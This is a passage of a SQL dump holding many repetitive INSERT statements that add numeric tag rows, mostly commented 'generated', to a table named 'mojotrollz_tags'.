'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1282, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1283, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1283, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1284, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1284, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1285, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1286, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1286, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1287, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1287, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1289, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1289, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1291, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1291, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1292, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1292, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1294, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1294, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1295, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1295, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1296, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1297, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1298, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1299, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1300, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1301, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1302, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1302, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1303, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1303, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1304, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1305, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1307, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1308, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1309, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1309, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1310, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1310, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1311, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1312, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1312, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1313, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1313, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1314, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1314, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1315, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1316, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1316, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1317, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1317, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1318, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1318, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1319, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1320, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1321, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1321, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1322, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1323, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1323, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1324, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1325, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1326, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1326, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1327, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1328, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1329, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1330, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1331, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1332, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1333, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1334, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1335, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1336, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1337, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1338, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1339, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1339, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1340, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1340, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1341, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1341, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1342, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1342, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1343, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1344, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1345, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1345, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1346, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1347, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1348, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1349, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1350, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1351, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1352, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1353, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1353, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1354, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1354, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1355, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1355, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1356, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1358, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1360, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1362, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1364, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1364, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1365, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1365, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1366, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1367, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1368, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1370, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1371, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1373, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1374, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1375, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1377, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1378, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1379, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1381, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1382, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1386, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1387, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1387, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1388, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1388, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1393, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1395, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1397, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1398, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1398, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1399, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1399, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1400, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1400, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1402, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1402, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1404, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1404, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1405, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1405, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1407, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1407, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1411, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1411, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1412, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1412, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1413, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1413, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1414, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1414, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1415, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1416, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1417, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1418, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1419, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1420, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1420, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1422, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (1423, 1, 1, 0, 'generated'); INSERT INTO 